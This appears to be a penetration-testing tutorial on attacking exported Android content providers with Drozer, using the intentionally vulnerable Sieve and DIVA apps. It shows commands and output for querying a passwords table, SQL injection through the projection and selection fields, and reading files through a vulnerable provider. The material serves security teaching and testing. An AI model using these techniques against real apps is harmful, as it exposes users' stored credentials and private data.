# Exploiting Content Providers

## Intro

A content provider component **supplies data from one application to others** on request. Such requests are handled by the methods of the ContentResolver class. A content provider can use different ways to store its data and the data can be **stored** in a **database**, in **files**, or even over a **network**.

It has to be declared inside the _Manifest.xml_ file. Example:

```markup
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
    <path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>
```

In this case, it's necessary the permission `READ_KEYS` to access `content://com.mwr.example.sieve.DBContentProvider/Keys`  
\(_Also, notice that in the next section we are going to access `/Keys/` which isn't protected, that's because the developer got confused and protected `/Keys` but declared `/Keys/`_\)

**Maybe you can access private data or exploit some vulnerability \(SQL Injection or Path Traversal\).**

## Get info from **exposed content providers**

```text
dz> run app.provider.info -a com.mwr.example.sieve 
  Package: com.mwr.example.sieve
  Authority: com.mwr.example.sieve.DBContentProvider
  Read Permission: null
  Write Permission: null
  Content Provider: com.mwr.example.sieve.DBContentProvider
  Multiprocess Allowed: True
  Grant Uri Permissions: False
  Path Permissions:
  Path: /Keys
  Type: PATTERN_LITERAL
  Read Permission: com.mwr.example.sieve.READ_KEYS
  Write Permission: com.mwr.example.sieve.WRITE_KEYS
  Authority: com.mwr.example.sieve.FileBackupProvider
  Read Permission: null
  Write Permission: null
  Content Provider: com.mwr.example.sieve.FileBackupProvider
  Multiprocess Allowed: True
  Grant Uri Permissions: False
```

We can **reconstruct** part of the content **URIs** to access the **DBContentProvider**, because we know that they must begin with “_content://_” and the information obtained by Drozer inside Path: _/Keys_.

Drozer can **guess and try several URIs**:

```text
dz> run scanner.provider.finduris -a com.mwr.example.sieve 
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
... 
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys 
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
```

You should also check the **ContentProvider code** to search for queries: 

![](../../../.gitbook/assets/image%20%28152%29.png)

Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:

![](../../../.gitbook/assets/image%20%28229%29.png)

The query will be like: `content://name.of.package.class/declared_name`

## **Database-backed Content Providers**

Probably most of the Content Providers are used as **interface** for a **database**. Therefore, if you can access it you could be able to **extract, update, insert and delete** information.   
Check if you can **access sensitive information** or try to change it to **bypass authorisation** mechanisms.

When checking the code of the Content Provider **look** also for **functions** named like: _query, insert, update and delete_:

![](../../../.gitbook/assets/image%20%28211%29.png)

![](../../../.gitbook/assets/image%20%28254%29.png)

Because you will be able to call them

### Query content

```text
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com
```

### Insert content

Quering the database you will learn the **name of the columns**, then, you could be able to insert data in the DB:

![](../../../.gitbook/assets/image%20%2834%29.png)

![](../../../.gitbook/assets/image%20%28156%29.png)

_Note that in insert and update you can use --string to indicate string, --double to indicate a double, --float, --integer, --long, --short, --boolean_

### Update content

Knowing the name of the columns you could also **modify the entries**:

![](../../../.gitbook/assets/image%20%28163%29.png)

### Delete content

![](../../../.gitbook/assets/image%20%2864%29.png)

### **SQL Injection**

It is simple to test for SQL injection **\(SQLite\)** by manipulating the **projection** and **selection fields** that are passed to the content provider.  
When quering the Content Provider there are 2 interesting arguments to search for information: _--selection_ and _--projection_:

![](../../../.gitbook/assets/image%20%28279%29.png)

You can try to **abuse** this **parameters** to test for **SQL injections**:

```text
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'" 
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
```

```text
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* 
FROM SQLITE_MASTER WHERE type='table';--" 
| type  | name             | tbl_name         | rootpage | sql              |
| table | android_metadata | android_metadata | 3        | CREATE TABLE ... | 
| table | Passwords        | Passwords        | 4        | CREATE TABLE ... |
```

#### Automatic SQLInjection discovery by Drozer

```text
dz> run scanner.provider.injection -a com.mwr.example.sieve 
Scanning com.mwr.example.sieve... 
Injection in Projection:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
  
dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
  android_metadata
  notes
  sqlite_sequence
```

## **File System-backed Content Providers**

Content providers could be also used to **access files:**

![](../../../.gitbook/assets/image%20%28297%29.png)

### Read **file**

You can read files from the Content Provider

```text
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 
127.0.0.1            localhost
```

### **Path Traversal**

If you can access files, you can try to abuse a Path Traversal \(in this case this isn't necessary but you can try to use "_../_" and similar tricks\). 

```text
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 
127.0.0.1            localhost
```

#### **Automatic Path Traversal discovery by Drozer**

```text
dz> run scanner.provider.traversal -a com.mwr.example.sieve 
Scanning com.mwr.example.sieve... 
Vulnerable Providers:
  content://com.mwr.example.sieve.FileBackupProvider/
  content://com.mwr.example.sieve.FileBackupProvider
```

## References

* [https://www.tutorialspoint.com/android/android\_content\_providers.htm](https://www.tutorialspoint.com/android/android_content_providers.htm)
* [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/)

